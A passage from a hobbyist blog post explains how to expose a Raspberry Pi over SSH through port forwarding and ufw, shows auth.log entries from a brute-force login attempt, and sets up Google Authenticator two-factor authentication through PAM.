should look for something that says “Forwarding” and add a new rule there.&lt;/p&gt;

&lt;p&gt;Now to know where we want to forward incoming requests to, we should know our local raspberry pi address. With the command &lt;code&gt;hostname –I&lt;/code&gt; we can find out which local address we’re on.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;tomas@raspberrypi:~ $ hostname -I
192.168.0.27
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now we can tell our router the following: “Whenever someone tries to connect to you, using SSH (common port 22), you should redirect them to this other device at address 192.168.0.27, also to port 22.”. This might not look the same to you, but should be very similar. Here are my forwarded ports. Internal refers to devices within the household and external is wide public. External is kept 0.0.0.0 since it’s not fixed (dynamic IP mentioned before), and router will translate this into it’s external IP.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Frmviklg8ylyo4r400x4d.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Frmviklg8ylyo4r400x4d.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;This is how your port forwarding should look like configured, notice ports 443 and 80 are also active, they are used for web hosting I'm currently working on, but won’t touch on today&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Once you have configured port forwarding, you still shouldn’t be able to connect to your machine. This is due to your firewall doing a great job of blocking incoming requests. If you’re able to connect to your machine right after this step, please install a firewall &lt;strong&gt;immediately&lt;/strong&gt; with &lt;code&gt;sudo apt-get install ufw&lt;/code&gt;. &lt;/p&gt;

&lt;p&gt;The final step is enabling your firewall with the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;tomas@raspberrypi:~ $&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;ufw allow OpenSSH
&lt;span class="go"&gt;Rule added
Rule added (v6)
&lt;/span&gt;&lt;span class="gp"&gt;tomas@raspberrypi:~ $&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;ufw allow SSH
&lt;span class="go"&gt;Rule added
Rule added (v6)
&lt;/span&gt;&lt;span class="gp"&gt;tomas@raspberrypi:~ $&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;ufw status
&lt;span class="go"&gt;Status: active
To                         Action      From
--                         ------      ----
OpenSSH                    ALLOW       Anywhere
WWW Full                   ALLOW       Anywhere
443                        ALLOW       Anywhere
SSH                        ALLOW       Anywhere
OpenSSH (v6)               ALLOW       Anywhere (v6)
WWW Full (v6)              ALLOW       Anywhere (v6)
443 (v6)                   ALLOW       Anywhere (v6)
SSH (v6)                   ALLOW       Anywhere (v6)

&lt;/span&gt;&lt;span class="gp"&gt;tomas@raspberrypi:~ $&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This should’ve opened your port 22, and now if you know your external IP address you should be able to connect to your raspberry pi from anywhere in the world. This can be done as simply as googling “whats my ip”.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fjauhndgpx9hptckz2goo.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fjauhndgpx9hptckz2goo.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now we can connect to our machine from anywhere in the world. Windows, Mac OS X, Linux, and pretty much anything with CLI. It’s as simple as writing “ssh &lt;a href="mailto:pi@188.252.184.34"&gt;pi@188.252.184.34&lt;/a&gt;”. Which is trying to establish an SSH connection to a device located at 188.252.184.34 as the user pi”. The request will come to our router, the router forwards the request to our server and the server challenges us for the password.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;C:\Users\Tomas&amp;gt;&lt;/span&gt;ssh tomas@martincic.dev
&lt;span class="go"&gt;Password:
&lt;/span&gt;&lt;span class="gp"&gt;Linux raspberrypi 5.4.51-v7+ #&lt;/span&gt;1333 SMP Mon Aug 10 16:45:19 BST 2020 armv7l
&lt;span class="go"&gt;
&lt;/span&gt;&lt;span class="gp"&gt;The programs included with the Debian GNU/Linux system are free software;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="go"&gt;the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 20 17:05:18 2020 from ::1
&lt;/span&gt;&lt;span class="gp"&gt;Linux raspberrypi 5.4.51-v7+ #&lt;/span&gt;1333 SMP Mon Aug 10 16:45:19 BST 2020 armv7l
&lt;span class="go"&gt;
&lt;/span&gt;&lt;span class="gp"&gt;The programs included with the Debian GNU/Linux system are free software;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="go"&gt;the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 20 17:05:18 2020 from ::1
&lt;/span&gt;&lt;span class="gp"&gt;tomas@raspberrypi:~ $&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;exit&lt;/span&gt;
&lt;span class="go"&gt;logout
Connection to martincic.dev closed.

&lt;/span&gt;&lt;span class="gp"&gt;C:\Users\Tomas&amp;gt;&lt;/span&gt;ssh tomas@188.252.184.34
&lt;span class="go"&gt;Password:
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And as hackers would say in movies: “We’re in!”. Now whatever you write within this command line will be executed on your server, where you are connecting to. &lt;br&gt;
&lt;strong&gt;Tip:&lt;/strong&gt; if you’re having trouble connecting, check &lt;a href="//canyouseeme.org"&gt;CanYouSeeMe.org&lt;/a&gt; and look if port 22 is open. If it’s not open, you might have to contact your service provider to unlock port forwarding for you or you have configured something wrong.&lt;br&gt;
&lt;strong&gt;Tip:&lt;/strong&gt; most often, internet service providers will provide your router with so-called Dynamic IP, which means your IP address will change every 24/48 hours.&lt;/p&gt;

&lt;p&gt;Notice I’m logging in with &lt;a href="mailto:tomas@martincic.dev"&gt;tomas@martincic.dev&lt;/a&gt;. This is user “tomas” trying to SSH into domain “martincic.dev” which will be resolved to my router’s external IP address (188.252.184.34). You see in the bottom part, I exit the connection and SSH again with my actual IP, it has the same effect.&lt;/p&gt;
&lt;h2&gt;
  
  
  Dangers of SSH
&lt;/h2&gt;

&lt;p&gt;The first time I’ve configured my server it took about 8 hours for me to notice some rather suspicious activity. I was looking through my auth.log (log of all authentications) when I noticed some strange requests from even stranger places. This file is located at /var/log/auth.log. To see only failed authentications, you can use&lt;/p&gt;

&lt;p&gt;&lt;code&gt;cat /var/log/auth.log | grep 'Failed password&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Sep 13 12:20:57 raspberrypi sshd[11951]: Invalid user felipe from 171.227.23.152 port 45198
Sep 13 12:20:58 raspberrypi sshd[11947]: Invalid user carmen from 171.227.23.152 port 35314
Sep 13 12:20:58 raspberrypi sshd[11959]: Invalid user pos from 171.227.23.152 port 46060
Sep 13 12:21:04 raspberrypi sshd[11981]: Invalid user shell from 171.227.23.152 port 42546
Sep 13 12:21:10 raspberrypi sshd[11992]: Invalid user linux from 171.227.23.152 port 1201
Sep 13 12:21:14 raspberrypi sshd[12004]: Invalid user admian from 171.227.23.152 port 36314
Sep 13 12:21:19 raspberrypi sshd[12007]: Invalid user iris from 171.227.23.152 port 39514
Sep 13 12:21:30 raspberrypi sshd[12022]: Invalid user edwin from 171.227.23.152 port 34324
Sep 13 12:21:33 raspberrypi sshd[12025]: Invalid user pos from 171.227.23.152 port 40330
Sep 13 12:31:07 raspberrypi sshd[12054]: Invalid user admin from 141.98.9.163 port 43245
Sep 13 12:31:12 raspberrypi sshd[12061]: Invalid user admin from 141.98.9.164 port 40057
Sep 13 12:31:14 raspberrypi sshd[12068]: Invalid user user from 141.98.9.165 port 36501
Sep 13 12:31:18 raspberrypi sshd[12075]: Invalid user admin from 141.98.9.166 port 46491
Sep 13 12:31:24 raspberrypi sshd[12080]: Invalid user osmc from 75.157.255.178 port 39744
Sep 13 12:31:30 raspberrypi sshd[12094]: Invalid user operator from 141.98.9.162 port 40986
Sep 13 12:31:35 raspberrypi sshd[12102]: Invalid user test from 141.98.9.163 port 40121
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And after this command, I was greeted by some kind of brute force attack attempt. This was going on for 30 minutes, sending requests every 2-5 seconds with a different username but mostly from the same address. There were a total of 1083 login attempts within 30 minutes. A website called &lt;a href="//whatismyipaddress.com"&gt;whatismyipaddress.com&lt;/a&gt; can give you interesting information about the IP address you’re looking up. The IP 171.227.23.152, which submitted alone more than 1000 login attempts, came from Vietnam.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F4n4r47yv2mtqcpapa876.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F4n4r47yv2mtqcpapa876.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is the reason we have to improve our web security. This would be the equivalent of locking your door but leaving the keys under the doormat. Since the server is active 24/7 and you’re not on it every day it would be very easy for someone to let this bot work on your server until it cracks it. Once your server is accessed, it can too be used for malicious activities on the internet and help the initial bot in new attacks.&lt;/p&gt;

&lt;h2&gt;
  
  
  Installing 2-factor authentication
&lt;/h2&gt;

&lt;p&gt;Setting up 2-factor authentication is relatively easy, and as with any other package you’re installing, you should first update your server with “sudo apt-get update”. You always have to make sure you’re running the latest version of your OS. We will install the Google 2 factor auth package called &lt;code&gt;libpam-google-authenticator&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;sudo apt-get install libpam-google-authenticator&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Once you’ve downloaded the package for the server, you should install the application on your mobile device as well. Google authenticator is available on &lt;a href="https://play.google.com/store/apps/details?id=com.google.android.apps.authenticator2&amp;amp;hl=en" rel="noopener noreferrer"&gt;Play Store&lt;/a&gt;, &lt;a href="https://apps.apple.com/us/app/google-authenticator/id388497605" rel="noopener noreferrer"&gt;Apple Store&lt;/a&gt; and even as &lt;a href="https://chrome.google.com/webstore/detail/authenticator/bhghoamapcdpbohphigoooaddinpkbai?hl=en" rel="noopener noreferrer"&gt;Chrome Extension&lt;/a&gt;. Once you’ve installed this on both devices, you can move on to the next step.&lt;/p&gt;

&lt;h2&gt;
  
  
  Configuring Google Authenticator
&lt;/h2&gt;

&lt;p&gt;Before we even start configuring google authenticator we should enable ChallengeResponseAuthentication in our SSH daemon. This will enable your server to challenge users trying to connect with additional authentication. You can find out more about this &lt;a href="https://access.redhat.com/solutions/336773#:~:text=%22ChallengeResponseAuthentication%22%20option%20controls%20support%20for,only%20for%20the%20user's%20password." rel="noopener noreferrer"&gt;here&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;sudo nano /etc/ssh/sshd_config&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fdapre7lr2nzpmgi94vnm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fdapre7lr2nzpmgi94vnm.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now once this is out of the way, we have to enable Pluggable Authentication Module (PAM for short). PAM provides dynamic authentication support for applications and services in a Linux system. We’ll find this file in &lt;code&gt;/etc/pam.d/sshd&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;sudo nano /etc/pam.d/sshd&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fbjkvod7defx7l9rj580d.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fbjkvod7defx7l9rj580d.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here you have to add the following line: &lt;/p&gt;

&lt;p&gt;&lt;code&gt;auth required pam_google_authenticator.so&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;You can add the following line either above or below &lt;code&gt;@include common-auth&lt;/code&gt; and the only difference is the moment you’re asked for authentication codes. Placing it above common-auth will result in the server challenging the user with authentication codes before the password, and placing it below will result in challenging after the password. I prefer before, so the bot trying to connect cannot even try to guess the password.&lt;/p&gt;

&lt;p&gt;You should restart the SSH daemon now. &lt;/p&gt;

&lt;p&gt;sudo systemctl restart ssh&lt;/p&gt;

&lt;p&gt;You’re ready for the final step now! Activating Google Authentication. Now you should start the package we downloaded in the beginning and follow through its steps. It will provide you with a QR code that can be scanned from a mobile application and it will provide you with a setup key if you’re feeling uncomfortable providing the app with camera access. Start the process with:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;google-authenticator&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Once you’re presented by the QR code, take your time to write down emergency scratch codes, these are your lifeline if your mobile device isn’t accessible.&lt;/p&gt;

&lt;p&gt;Now you could set this up however you like it. My choices were &lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Time-based tokens [Yes]&lt;/li&gt;
&lt;li&gt;Update your /home/pi/.google_authenticator file (&lt;strong&gt;required Yes&lt;/strong&gt;)&lt;/li&gt;
&lt;li&gt;Disallowing multiple uses of same token [Yes]&lt;/li&gt;
&lt;li&gt;Poor synchronization adjustment [No]&lt;/li&gt;
&lt;li&gt;Limit to 3 logins per 30 seconds [Yes]&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;And that’s it. You’re ready to try SSH with your new authenticator! &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fk12gwwqg5tl1gc1yudfj.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fk12gwwqg5tl1gc1yudfj.jpg" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Authentication code challenge upon SSH request&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;When the verification code is not matching, you will still be prompted for a password even though you failed step 1 of authentication. This is useful since any kind of attacker will have no idea that they failed step 1, and if a valid password is provided you still won’t be allowed access. You will be prompted for verification code 3 times before the authenticator completely blocks you out. In the picture below, when asked, I’ve provided the right password every time, but I’ve deliberately provided wrong verification codes. Google auth simply denies any sort of access if you provide the wrong code and simply waits for the connection to time out.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Ffjfgee43ztc6jxt2ath2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Ffjfgee43ztc6jxt2ath2.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Wrong codes with the right password provided every time&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;This SSH access to our remote machine can be useful for IoT devices and any kind of server maintenance. After adding additional authentication we’ve further improved security on our device. Even though the most secure method of accessing would be using a public/private key pair, this is not very convenient since you’re not carrying your key around you like your phone. This way you can show off to your friends and still have a good dose of security. While you’re not storing some very sensitive information on the machine, this method is secure enough.&lt;/p&gt;

</description>
      <category>raspberrypi</category>
      <category>ssh</category>
      <category>2fa</category>
      <category>security</category>
    </item>
  </channel>
</rss>
